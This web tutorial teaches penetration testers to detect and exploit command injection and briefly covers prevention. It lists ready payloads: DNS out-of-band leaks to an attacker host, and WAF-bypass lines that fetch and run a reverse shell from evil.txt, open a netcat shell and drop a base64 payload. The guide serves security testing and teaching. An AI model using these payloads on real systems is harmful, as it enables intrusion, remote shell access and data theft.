The Penetration Tester's Guide to Command Injection
What is command injection?
Command injection is an attack whose goal is to execute arbitrary commands on the host operating system through a vulnerable application. These types of attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to the system shell. In such an attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Often, they are possible due to insufficient input validation.
This attack is different from code injection because code injection allows the attacker to add their own code which is then executed by the application. In command injection, the attacker extends the default functionality of the application to execute system commands without injecting code.
What are the effects of command injection?
This vulnerability allows an attacker to run operating system commands with the privileges of the vulnerable application. Depending on the privileges of the current user, this vulnerability could lead to access to the system, disclosure of critical sensitive data, and could lead to complete control takeover of the server or system.
How to detect and exploit them?
Assume that you are testing the parameters of the following URL during a penetration test:
https://vulnerable-website.com/endpoint?parameter=123
To detect if the source code is not protected against command injection, we can try several methods:
Insert special characters to detect delimiters:
We can inject some special characters to see if the application blocks anything that could be used for command injection:
&
;
换行符 (0x0a or \n)
&&
|
||
If the application does not throw any error messages, we can try to inject our command after using one of these delimiters.
https://vulnerable-website.com/endpoint?parameter=1|whoami
Detecting blind operating system command injection
Time delay
Most operating system command injections are blind, which does not provide any output for the executed command. To verify the vulnerability, we can use a time delay to verify the command injection after detecting the allowed special characters, as shown below:
https://vulnerable-website.com/endpoint?parameter=x||ping+-c+10+127.0.0.1||
Redirecting Output
We can also redirect the output of the command in an output file and then retrieve that file on the browser. A payload similar to the following can be used:
https://vulnerable-website.com/endpoint?parameter=||whoami>/var/www/images/output.txt||
OOB (Out Of Band) Usage
We can also trigger OOB network interactions with external servers such as Burp Collaborator. We can use a payload similar to the following:
https://vulnerable-website.com/endpoint?parameter=x||nslookup+burp.collaborator.address||
Alternatively, we can use a payload similar to the following to leak the output of the command:
https://vulnerable-website.com/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||
The most common parameters that can be considered when testing for command injection are as follows:
cmd
- exec
- command
- execute
- ping
- query
- jump
- code
- reg
- do
- func
- arg
- option
- load
- process
- step
- read
- function
- req
- feature
- exe
- module
- payload
- run
Notes
Special characters
&
;
换行符 (0x0a or \n)
&&
|
||
command \`
$(command )
Linux command:
whoami
ifconfig
ls
uname -a
Windows command:
whoami
ipconfig
dir
ver
Supported by both Unix and Windows
ls||id; ls ||id; ls|| id; ls || id
ls|id; ls |id; ls| id; ls | id
ls&&id; ls &&id; ls&& id; ls && id
ls&id; ls &id; ls& id; ls & id
ls %0A id
Time delay command
& ping -c 10 127.0.0.1 &
Redirecting Output
& whoami > /var/www/images/output.txt &
OOB (Out Of Band) Usage
& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &
Bypassing WAF
vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
How to prevent it?
There are many ways to prevent this vulnerability. Here are a few suggestions:
- Avoid using shell execution functions. If unavoidable, limit their use to very specific use cases.
- Perform proper input validation when passing user input into the shell to execute commands.
- Use secure APIs when accepting user input into your application.
- Escape special characters when the security API is not available.
For reprinting, please send an email to 1244347461@qq.com for approval. After obtaining the author's consent, kindly include the source as a link.
Related Articles
Detailed explanation of the implementation methods of SSO single sign-on in three
Publish Date:2025/03/18 Views:190 Category:NETWORK
-
Single Sign On (SSO) is not unfamiliar to us. For large systems, using SSO can reduce a lot of trouble for users. Take Baidu for example. Baidu has many subsystems - Baidu Experience, Baidu Knows, Baidu Library, etc. If we need to enter a u
What multipart/form-data does in post Upload upload files
Publish Date:2025/03/18 Views:63 Category:NETWORK
-
Everyone has used the attribute enctype="multipart/form-data" when uploading files using a form. What is the role of multipart/form-data? Let's talk about this topic. First, let's look at a case Look at the first code form action= "handl
About application/x-www-form-urlencoded
Publish Date:2025/03/18 Views:147 Category:NETWORK
-
As a data format of form, application/x-www-form-urlencoded has its own characteristics form action= "handle.php" method= "post" input type= "text" name= " uname" class= " uname" /br / input type= "text" name= "email" class=
My understanding of webservice is this
Publish Date:2025/03/18 Views:147 Category:NETWORK
-
Recently, I encountered such a project at work (temporarily named Project A). Project A itself was developed in PHP, but its data came from another project developed in Java (temporarily named Project B). Project A could not operate the dat
WSDL looks like this
Publish Date:2025/03/18 Views:190 Category:NETWORK
-
When I first started learning Webservice, I found that there were quite a lot of knowledge points involved, and each point could be a school of its own. Especially when I saw WSDL, I looked up information for a long time, but I was still a
Which technology do you choose to implement the web chat room?
Publish Date:2025/03/18 Views:61 Category:NETWORK
-
With the rise of HTML5 Websockets, web chat applications are becoming more and more popular. Recently, I am working on a mobile web application, the core function of which is to implement web chat on the mobile phone. Of course, the functio
Implementing a group chat room using socket.io
Publish Date:2025/03/18 Views:65 Category:NETWORK
-
This article will share with you an example of using socket.io to realize the function of group chat. If you want to use socket.io, you must use nodejs to implement the server, so we need to install socket.io in nodejs Install socket.io How
First contact with CGI
Publish Date:2025/03/18 Views:51 Category:NETWORK
-
Since I am a PHP programmer, I often have to build a PHP operating environment. The popular nginx+php environment is very popular, and the mode it adopts is the FastCGI method, so I spent some time to learn about FastCGI. CGI (Common Gatewa
Getting started with FastCGI
Publish Date:2025/03/18 Views:164 Category:NETWORK
-
In "First Contact with CGI", we mentioned the operating mechanisms of CGI and Server APIs, as well as their respective advantages and disadvantages. In this chapter, we will learn about FastCGI, which combines the advantages of CGI and Serv
